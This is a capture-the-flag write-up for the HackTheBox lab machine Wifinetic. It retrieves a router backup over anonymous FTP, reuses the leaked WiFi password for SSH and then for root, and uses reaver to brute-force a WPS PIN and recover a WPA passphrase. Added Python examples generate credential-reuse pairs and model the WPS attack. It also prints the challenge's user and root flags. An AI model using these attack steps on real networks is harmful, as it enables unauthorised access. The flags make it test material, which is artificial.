HTB: Wifinetic [WriteUp]
Table of Contents
Connect to HTB and start the target machine
1.What is the name of the OpenWRT backup file accessible over FTP?
Use nmap to run script and service-version scans against ports 21 and 22 of the target
2.What's the WiFi password for SSID OpenWRT?
3.Which user reused the WiFi password on their local account?
4.Submit the flag located in the netadmin user's home directory.
USER_FLAG:cc0491634861e5a3964c119ea9e35c79
5.What user space daemon software is being used to create access point and authentication servers?
6.Which interface is being used for monitoring?
7.What is the WPA password for the network on the mon0 interface?
8.Submit the flag located on the root folder.
ROOT_FLAG:1721e8c80650230ffc3ae02e11ed01f4
Connect to HTB and start the target machine
Target IP: 10.10.11.247
Assigned IP: 10.10.16.6
1.What is the name of the OpenWRT backup file accessible over FTP?
Port-scan the target with fscan
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# fscan -nopoc -nobr -no -h 10.10.11.247
   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
10.10.11.247:22 open
10.10.11.247:21 open
[*] alive ports len is: 2
start vulscan
done 2/2
[*] scan finished, elapsed: 374.224745ms
The scan shows exactly two open ports on the target: 21 (FTP) and 22 (SSH).
Use nmap to run script and service-version scans against ports 21 and 22 of the target
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p 21,22 -sCV 10.10.11.247
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-18 01:51 EDT
Nmap scan report for 10.10.11.247
Host is up (0.13s latency).

PORT   STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 4434 Jul 31 2023 MigrateOpenWrt.txt
| -rw-r--r-- 1 ftp ftp 2501210 Jul 31 2023 ProjectGreatMigration.pdf
| -rw-r--r-- 1 ftp ftp 60857 Jul 31 2023 ProjectOpenWRT.pdf
| -rw-r--r-- 1 ftp ftp 40960 Sep 11 2023 backup-OpenWrt-2023-07-26.tar
|_-rw-r--r-- 1 ftp ftp 52946 Jul 31 2023 employees_wellness.pdf
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.16.6
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.31 seconds
The ftp-anon script already reports that anonymous login is allowed, so log in to the target's FTP server as Anonymous (any password is accepted):
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ftp 10.10.11.247
Connected to 10.10.11.247.
220 (vsFTPd 3.0.3)
Name (10.10.11.247:kali): Anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||47610|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 4434 Jul 31 2023 MigrateOpenWrt.txt
-rw-r--r-- 1 ftp ftp 2501210 Jul 31 2023 ProjectGreatMigration.pdf
-rw-r--r-- 1 ftp ftp 60857 Jul 31 2023 ProjectOpenWRT.pdf
-rw-r--r-- 1 ftp ftp 40960 Sep 11 2023 backup-OpenWrt-2023-07-26.tar
-rw-r--r-- 1 ftp ftp 52946 Jul 31 2023 employees_wellness.pdf
226 Directory send OK.
The listing contains one OpenWrt backup file: backup-OpenWrt-2023-07-26.tar
2.What's the WiFi password for SSID OpenWRT?
Download backup-OpenWrt-2023-07-26.tar to the local machine
get backup-OpenWrt-2023-07-26.tar
ftp> get backup-OpenWrt-2023-07-26.tar
local: backup-OpenWrt-2023-07-26.tar remote: backup-OpenWrt-2023-07-26.tar
229 Entering Extended Passive Mode (|||46040|)
150 Opening BINARY mode data connection for backup-OpenWrt-2023-07-26.tar (40960 bytes).
100% |*************************************************************| 40960 162.37 KiB/s 00:00 ETA
226 Transfer complete.
40960 bytes received in 00:00 (61.77 KiB/s)
Extract backup-OpenWrt-2023-07-26.tar (an OpenWrt backup is a plain tar of /etc, so the UCI configuration, passwd and the dropbear host keys all come out in cleartext)
tar -xvf backup-OpenWrt-2023-07-26.tar
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# tar -xvf backup-OpenWrt-2023-07-26.tar
./etc/
./etc/config/
./etc/config/system
./etc/config/wireless
./etc/config/firewall
./etc/config/network
./etc/config/uhttpd
./etc/config/dropbear
./etc/config/ucitrack
./etc/config/rpcd
./etc/config/dhcp
./etc/config/luci
./etc/uhttpd.key
./etc/uhttpd.crt
./etc/sysctl.conf
./etc/inittab
./etc/group
./etc/opkg/
./etc/opkg/keys/
./etc/opkg/keys/4d017e6f1ed5d616
./etc/hosts
./etc/passwd
./etc/shinit
./etc/rc.local
./etc/dropbear/
./etc/dropbear/dropbear_ed25519_host_key
./etc/dropbear/dropbear_rsa_host_key
./etc/shells
./etc/profile
./etc/nftables.d/
./etc/nftables.d/10-custom-filter-chains.nft
./etc/nftables.d/README
./etc/luci-uploads/
./etc/luci-uploads/.placeholder
Change into the extracted directory and read etc/config/wireless, the UCI file that holds the WiFi configuration:
┌──(root㉿kali)-[/home/…/Desktop/temp/etc/config]
└─# cat wireless
config wifi-device 'radio0'
        option type 'mac80211'
        option path 'virtual/mac80211_hwsim/hwsim0'
        option cell_density '0'
        option channel 'auto'
        option band '2g'
        option txpower '20'

config wifi-device 'radio1'
        option type 'mac80211'
        option path 'virtual/mac80211_hwsim/hwsim1'
        option channel '36'
        option band '5g'
        option htmode 'HE80'
        option cell_density '0'

config wifi-iface 'wifinet0'
        option device 'radio0'
        option mode 'ap'
        option ssid 'OpenWrt'
        option encryption 'psk'
        option key 'VeRyUniUqWiFIPasswrd1!'
        option wps_pushbutton '1'

config wifi-iface 'wifinet1'
        option device 'radio1'
        option mode 'sta'
        option network 'wwan'
        option ssid 'OpenWrt'
        option encryption 'psk'
        option key 'VeRyUniUqWiFIPasswrd1!'
The PSK for SSID OpenWrt is VeRyUniUqWiFIPasswrd1!. The same key is used by the access point (wifinet0 on radio0) and by the station interface (wifinet1 on radio1), and the AP has WPS push-button enabled (wps_pushbutton '1'), which matters later.
3.Which user reused the WiFi password on their local account?
Read etc/passwd from the backup to see which accounts exist:
┌──(root㉿kali)-[/home/kali/Desktop/temp/etc]
└─# cat passwd
root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
ntp:x:123:123:ntp:/var/run/ntp:/bin/false
dnsmasq:x:453:453:dnsmasq:/var/run/dnsmasq:/bin/false
logd:x:514:514:logd:/var/run/logd:/bin/false
ubus:x:81:81:ubus:/var/run/ubus:/bin/false
netadmin:x:999:999::/home/netadmin:/bin/false
Every entry except root and netadmin is a system account (locked '*' password field or a /var run directory as home). netadmin is the only personal account, so try the WiFi password from the backup against it over SSH. The /bin/false shell in this passwd belongs to the router image; the host behind port 22 is an Ubuntu box, as the banner below shows:
┌──(root㉿kali)-[/home/kali/Desktop/temp/etc]
└─# ssh netadmin@10.10.11.247
The authenticity of host '10.10.11.247 (10.10.11.247)' can't be established.
ED25519 key fingerprint is SHA256:RoZ8jwEnGGByxNt04+A/cdluslAwhmiWqG3ebyZko+A.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:3: [hashed name]
~/.ssh/known_hosts:5: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.247' (ED25519) to the list of known hosts.
netadmin@10.10.11.247's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-162-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri 18 Oct 2024 09:30:32 AM UTC

  System load:  0.0
  Usage of /:   65.7% of 4.76GB
  Memory usage: 7%
  Swap usage:   0%
  Processes:    228
  Users logged in: 0
  IPv4 address for eth0:  10.10.11.247
  IPv6 address for eth0:  dead:beef::250:56ff:feb9:e5b6
  IPv4 address for wlan0: 192.168.1.1
  IPv4 address for wlan1: 192.168.1.23

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.
   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Sep 12 12:46:00 2023 from 10.10.14.23
netadmin@wifinetic:~$
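Steps 2 and 3 are really one task: pull every credential out of the leaked backup and decide which local accounts it is worth trying against. The script below is an added example, not part of the original write-up; it parses the UCI format of etc/config/wireless and the backup's etc/passwd. WIRELESS and PASSWD are constructed samples trimmed from the two files shown above, and the candidate-account heuristic (root plus any unlocked account with a home under /home) is this example's own choice.

```python
"""Added example: extract WiFi PSKs from an OpenWrt backup's UCI wireless config
and list the local accounts a reused password should be tested against."""
import re
from typing import Dict, List, Tuple

# Constructed sample, trimmed from etc/config/wireless in the backup above.
WIRELESS = """
config wifi-device 'radio0'
        option type 'mac80211'
        option channel 'auto'

config wifi-iface 'wifinet0'
        option device 'radio0'
        option mode 'ap'
        option ssid 'OpenWrt'
        option encryption 'psk'
        option key 'VeRyUniUqWiFIPasswrd1!'
        option wps_pushbutton '1'

config wifi-iface 'wifinet1'
        option device 'radio1'
        option mode 'sta'
        option network 'wwan'
        option ssid 'OpenWrt'
        option encryption 'psk'
        option key 'VeRyUniUqWiFIPasswrd1!'
"""

# Constructed sample, trimmed from etc/passwd in the backup above.
PASSWD = """\
root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
ntp:x:123:123:ntp:/var/run/ntp:/bin/false
netadmin:x:999:999::/home/netadmin:/bin/false
"""

# UCI syntax: "config <type> '<name>'" opens a section, "option <key> '<value>'" fills it.
_SECTION = re.compile(r"^config\s+(\S+)(?:\s+'([^']*)')?\s*$")
_OPTION = re.compile(r"^\s*option\s+(\S+)\s+'([^']*)'\s*$")


def parse_uci(text: str) -> List[Dict[str, str]]:
    """One dict per UCI section; '.type' and '.name' carry the header fields."""
    sections: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = _SECTION.match(line)
        if m:
            sections.append({".type": m.group(1), ".name": m.group(2) or ""})
            continue
        m = _OPTION.match(line)
        if m and sections:
            sections[-1][m.group(1)] = m.group(2)
    return sections


def wifi_credentials(sections: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Every wifi-iface protected by a pre-shared key ('psk', 'psk2', 'psk-mixed'),
    with its WPS push-button flag. 'sae' (WPA3) would carry no offline-crackable PSK."""
    creds = []
    for s in sections:
        if s.get(".type") != "wifi-iface":
            continue
        if not s.get("encryption", "none").startswith("psk"):
            continue
        creds.append({
            "iface": s[".name"],
            "mode": s.get("mode", ""),
            "ssid": s.get("ssid", ""),
            "key": s.get("key", ""),
            "wps": s.get("wps_pushbutton") == "1",
        })
    return creds


def login_candidates(passwd: str) -> List[str]:
    """root plus every account with a home under /home whose password field is not
    locked ('*' or '!'). The shell is deliberately ignored: this passwd is the
    router's, while the SSH service belongs to a different (Ubuntu) host."""
    names = []
    for line in passwd.splitlines():
        f = line.split(":")
        if len(f) < 7:
            continue
        name, pw, uid, home = f[0], f[1], int(f[2]), f[5]
        if pw in ("*", "!", "!!"):
            continue
        if uid == 0 or home.startswith("/home/"):
            names.append(name)
    return names


def reuse_pairs(wireless: str, passwd: str) -> List[Tuple[str, str]]:
    """(user, password) pairs to test, one per distinct WiFi key."""
    keys = sorted({str(c["key"]) for c in wifi_credentials(parse_uci(wireless))})
    return [(u, k) for u in login_candidates(passwd) for k in keys]


if __name__ == "__main__":
    for c in wifi_credentials(parse_uci(WIRELESS)):
        print(f"{c['iface']:<9} {c['mode']:<4} ssid={c['ssid']!r} key={c['key']!r} wps={c['wps']}")
    for user, key in reuse_pairs(WIRELESS, PASSWD):
        print(f"try: ssh {user}@10.10.11.247   # password {key!r}")
```

On this backup the output is two PSK entries sharing one key, with WPS enabled on the AP, and two login candidates (root and netadmin); the write-up's manual SSH attempt is the first of those pairs.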
4.Submit the flag located in the netadmin user's home directory.
Locate the user flag
find / -name 'user.txt' 2>/dev/null
Read the user flag
cat /home/netadmin/user.txt
netadmin@wifinetic:~$ whoami
netadmin
netadmin@wifinetic:~$ find / -name 'user.txt' 2>/dev/null
/home/netadmin/user.txt
netadmin@wifinetic:~$ cat /home/netadmin/user.txt
cc0491634861e5a3964c119ea9e35c79
USER_FLAG:cc0491634861e5a3964c119ea9e35c79
5.What user space daemon software is being used to create access point and authentication servers?
Check the WiFi service: hostapd is the user-space daemon that runs the access point and the WPA/WPA2/802.1X authenticator, and its unit is active
systemctl status hostapd.service
netadmin@wifinetic:~$ systemctl status hostapd.service
● hostapd.service - Advanced IEEE 802.11 AP and IEEE 802.1X/WPA/WPA2/EAP Authenticator
Loaded: loaded (/lib/systemd/system/hostapd.service; enabled; vendor preset: enabled)
Active: active (running) since Fri 2024-10-18 10:54:27 UTC; 5s ago
Process: 27508 ExecStart=/usr/sbin/hostapd -B -P /run/hostapd.pid -B $DAEMON_OPTS ${DAEMON_CONF} (code=exited, status=0/SUCCESS)
Main PID: 27525 (hostapd)
Tasks: 1 (limit: 4595)
Memory: 936.0K
CGroup: /system.slice/hostapd.service
└─27525 /usr/sbin/hostapd -B -P /run/hostapd.pid -B /etc/hostapd/hostapd.conf
6.Which interface is being used for monitoring?
List the wireless interfaces and their modes (these are mac80211_hwsim virtual radios, which is why the MACs look like 02:00:00:00:0X:00)
iw dev
netadmin@wifinetic:~$ iw dev
phy#2
Interface mon0
ifindex 7
wdev 0x200000002
addr 02:00:00:00:02:00
type monitor
txpower 20.00 dBm
Interface wlan2
ifindex 5
wdev 0x200000001
addr 02:00:00:00:02:00
type managed
txpower 20.00 dBm
phy#1
Unnamed/non-netdev interface
wdev 0x1000001e6
addr 42:00:00:00:01:00
type P2P-device
txpower 20.00 dBm
Interface wlan1
ifindex 4
wdev 0x100000001
addr 02:00:00:00:01:00
ssid OpenWrt
type managed
channel 1 (2412 MHz), width: 20 MHz (no HT), center1: 2412 MHz
txpower 20.00 dBm
phy#0
Interface wlan0
ifindex 3
wdev 0x1
addr 02:00:00:00:00:00
ssid OpenWrt
type AP
channel 1 (2412 MHz), width: 20 MHz (no HT), center1: 2412 MHz
txpower 20.00 dBm
From the output: mon0 (on phy#2, sharing the radio with wlan2) is the only interface in monitor mode, wlan1 and wlan2 are in managed mode, and wlan0 is the access point for SSID OpenWrt with BSSID 02:00:00:00:00:00.
A monitor-mode interface lets an unprivileged process capture and inject raw 802.11 frames, so mon0 can be used to attack the AP on wlan0 and recover its WPA passphrase.
7.What is the WPA password for the network on the mon0 interface?
Check which binaries carry file capabilities. Injecting raw 802.11 frames needs CAP_NET_RAW, which a normal user does not have; reaver, however, ships here with cap_net_raw+ep, so netadmin can run it without root
getcap -r / 2>/dev/null
netadmin@wifinetic:~$ getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/reaver = cap_net_raw+ep
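The interesting entry is the one that does not belong to a stock install. The script below is an added example (not from the write-up) that triages `getcap -r /` output and flags risky capabilities outside a distro baseline; GETCAP_OUTPUT reuses the listing above as constructed sample input, and EXPECTED_BASELINE is an assumption about what Ubuntu 20.04 packages ship with, not something the target confirms.

```python
"""Added example: triage `getcap -r /` output and flag file capabilities that hand
an unprivileged user root-like network powers."""
from typing import Dict, List, Set, Tuple

# Constructed sample: the getcap listing from the target above.
GETCAP_OUTPUT = """\
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/reaver = cap_net_raw+ep
"""

# Assumed baseline: capabilities these binaries carry on a stock Ubuntu 20.04 install.
EXPECTED_BASELINE: Dict[str, Set[str]] = {
    "/usr/bin/ping": {"cap_net_raw"},
    "/usr/bin/mtr-packet": {"cap_net_raw"},
    "/usr/bin/traceroute6.iputils": {"cap_net_raw"},
    "/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper": {"cap_net_bind_service", "cap_net_admin"},
}

# Capabilities that matter to an attacker without root, and why.
RISKY: Dict[str, str] = {
    "cap_net_raw": "raw/packet sockets: sniff and inject frames (what reaver needs on mon0)",
    "cap_net_admin": "configure interfaces, routes, monitor mode",
    "cap_setuid": "change to uid 0",
    "cap_setgid": "change to gid 0",
    "cap_dac_override": "bypass file permission checks",
    "cap_dac_read_search": "read any file, e.g. /etc/shadow",
    "cap_sys_admin": "mounts, namespaces: effectively root",
    "cap_sys_ptrace": "attach to any process",
    "cap_sys_module": "load kernel modules",
    "cap_chown": "take ownership of any file",
    "cap_fowner": "ignore file ownership checks",
}


def parse_getcap(text: str) -> Dict[str, Tuple[Set[str], str]]:
    """Map path -> (capability names, flag letters). Handles both output styles:
    libcap 2.3x  '/usr/bin/ping = cap_net_raw+ep'
    libcap 2.4x+ '/usr/bin/ping cap_net_raw=ep'"""
    entries: Dict[str, Tuple[Set[str], str]] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if " = " in line:
            path, caps = line.split(" = ", 1)
            names, _, flags = caps.partition("+")
        else:
            path, _, caps = line.rpartition(" ")
            names, _, flags = caps.partition("=")
        entries[path] = ({n for n in names.split(",") if n}, flags)
    return entries


def unexpected_risky(entries: Dict[str, Tuple[Set[str], str]]) -> Dict[str, List[Tuple[str, str]]]:
    """Paths carrying a risky capability that is not in the baseline. Only the
    permitted set ('p') counts: a capability that is merely inheritable cannot be
    used by the binary on its own."""
    findings: Dict[str, List[Tuple[str, str]]] = {}
    for path, (caps, flags) in entries.items():
        if "p" not in flags:
            continue
        baseline = EXPECTED_BASELINE.get(path, set())
        hits = [(c, RISKY[c]) for c in sorted(caps) if c in RISKY and c not in baseline]
        if hits:
            findings[path] = hits
    return findings


if __name__ == "__main__":
    for path, hits in unexpected_risky(parse_getcap(GETCAP_OUTPUT)).items():
        for cap, why in hits:
            print(f"{path}: {cap} -> {why}")
```

Run against the listing above it reports exactly one finding, /usr/bin/reaver with cap_net_raw: a WPS attack tool that any local user can point at the AP. The defensive reading is the same check run from a hardening baseline, where `setcap -r /usr/bin/reaver` (or not installing it) is the fix.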
Run reaver on mon0 against the BSSID of the wlan0 access point (02:00:00:00:00:00). The backup's wireless config showed WPS enabled on this AP, so reaver can brute-force the WPS PIN and the AP will hand over the WPA PSK in the WPS exchange
reaver -i mon0 -b 02:00:00:00:00:00
netadmin@wifinetic:~$ reaver -i mon0 -b 02:00:00:00:00:00
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from 02:00:00:00:00:00
[+] Received beacon from 02:00:00:00:00:00
[!] Found packet with bad FCS, skipping...
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] WPS PIN: '12345670'
[+] WPA PSK: 'WhatIsRealAnDWhAtIsNot51121!'
[+] AP SSID: 'OpenWrt'
Recovered WPA password: WhatIsRealAnDWhAtIsNot51121! (the WPS PIN was 12345670, the placeholder PIN from hostapd's sample hostapd.conf)
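Why the PIN falls in seconds rather than in 10^8 guesses: a WPS PIN is 8 digits with the last one a checksum, and the registrar (hostapd here) rejects a wrong first half (EAP-NACK after message M4) before it ever looks at the second half (EAP-NACK after M6). The two halves are therefore brute-forced independently, 10^4 + 10^3 = 11,000 attempts at most. The block below is an added example, not reaver's code or part of the write-up: WpsOracle is a toy model of that two-stage leak, not the real EAP-WSC exchange, and the checksum follows the WPS specification.

```python
"""Added example: WPS PIN checksum and a toy model of the split-PIN brute force
that reaver performs against a WPS-enabled AP."""


def wps_checksum(first7: str) -> int:
    """Checksum digit for a 7-digit PIN prefix (WPS spec): weights 3,1,3,1,3,1,3
    over the digits, then the digit that rounds the sum up to a multiple of 10."""
    if len(first7) != 7 or not first7.isdigit():
        raise ValueError("need exactly 7 digits")
    total = sum((3 if i % 2 == 0 else 1) * int(d) for i, d in enumerate(first7))
    return (10 - total % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True for an 8-digit PIN whose last digit is the correct checksum."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(pin[:7])


def max_attempts() -> int:
    """Worst case for the split attack: 10^4 first halves + 10^3 second halves
    (7th digit free, 8th forced by the checksum)."""
    return 10**4 + 10**3


class WpsOracle:
    """Toy registrar. Real hostapd answers a wrong first half with a NACK after M4
    and a wrong second half with a NACK after M6; that ordering is the whole
    attack, so it is the only thing modelled here."""

    def __init__(self, pin: str):
        if not is_valid_pin(pin):
            raise ValueError("registrar PIN must carry a valid checksum")
        self._first, self._second = pin[:4], pin[4:]
        self.attempts = 0

    def try_pin(self, pin: str) -> str:
        self.attempts += 1
        if pin[:4] != self._first:
            return "NACK_M4"
        if pin[4:] != self._second:
            return "NACK_M6"
        return "OK"


def recover_pin(oracle: WpsOracle) -> str:
    """Reaver's strategy: sweep the first half with an arbitrary valid second half
    until the failure moves from M4 to M6, then sweep the second half."""
    first = None
    for a in range(10**4):
        cand = f"{a:04d}"
        filler = cand + "000"
        if oracle.try_pin(filler + str(wps_checksum(filler))) != "NACK_M4":
            first = cand
            break
    if first is None:
        raise RuntimeError("no first half accepted")
    for b in range(10**3):
        body = first + f"{b:03d}"
        pin = body + str(wps_checksum(body))
        if oracle.try_pin(pin) == "OK":
            return pin
    raise RuntimeError("no second half accepted")


if __name__ == "__main__":
    ap = WpsOracle("12345670")   # the PIN reaver recovered above
    print(recover_pin(ap), "after", ap.attempts, "attempts (worst case", max_attempts(), ")")
```

Against the PIN 12345670 the model needs 1,803 attempts (1,235 for the first half, 568 for the second). Lockout after a few failed PINs slows this but does not remove it; the practical fix is to disable WPS on the AP entirely (drop `option wps_pushbutton '1'` from the OpenWrt config, or `wps_state=0` in hostapd.conf) and to stop reusing the WPA passphrase as a local account password.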
8.Submit the flag located on the root folder.
Password reuse again: try the recovered WPA passphrase as root's password with su
netadmin@wifinetic:~$ su root
Password:
root@wifinetic:/home/netadmin# whoami
root
Locate the root flag
find / -name 'root.txt' 2>/dev/null
Read the root flag
cat /root/root.txt
root@wifinetic:/home/netadmin# find / -name 'root.txt' 2>/dev/null
/root/root.txt
root@wifinetic:/home/netadmin# cat /root/root.txt
1721e8c80650230ffc3ae02e11ed01f4